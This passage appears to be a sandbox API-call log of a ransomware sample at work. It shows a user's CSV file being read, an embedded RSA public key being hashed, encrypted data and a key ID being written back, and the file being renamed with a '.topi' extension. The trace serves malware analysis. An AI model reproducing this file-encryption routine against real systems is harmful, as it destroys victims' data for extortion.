lpNewFilePointer=0x0) returned 1 [0095.116] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.117] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.117] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x176a3, lpOverlapped=0x0) returned 1 [0095.118] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.118] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.118] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.118] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.119] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.119] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.119] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.119] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.119] GetLastError () returned 0x0 [0095.119] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.119] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.119] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.119] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.119] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x176a0) returned 0x9a06a00 [0095.120] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1848 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1890 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.120] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9390 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9378 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.121] GetCurrentThreadId () returned 0x8c4 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5ad0 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.121] GetCurrentThreadId () returned 0x8c4 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93a8 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1890 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.124] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1769e, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1769e, lpOverlapped=0x0) returned 1 [0095.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.125] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x176a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.125] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.125] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.125] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.125] CloseHandle (hObject=0x6a8) returned 1 [0095.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.128] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QDvr5quvK.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdvr5quvk.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QDvr5quvK.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdvr5quvk.csv.topi")) returned 1 [0095.129] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.129] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.129] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.130] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf64cb840, ftCreationTime.dwHighDateTime=0x1d53b16, ftLastAccessTime.dwLowDateTime=0xd3aa5e30, ftLastAccessTime.dwHighDateTime=0x1d5414e, ftLastWriteTime.dwLowDateTime=0xd3aa5e30, ftLastWriteTime.dwHighDateTime=0x1d5414e, nFileSizeHigh=0x0, nFileSizeLow=0x2c26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSZwHHbt_h.pptx", cAlternateFileName="RSZWHH~1.PPT")) returned 1 [0095.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.130] RtlAllocateHeap 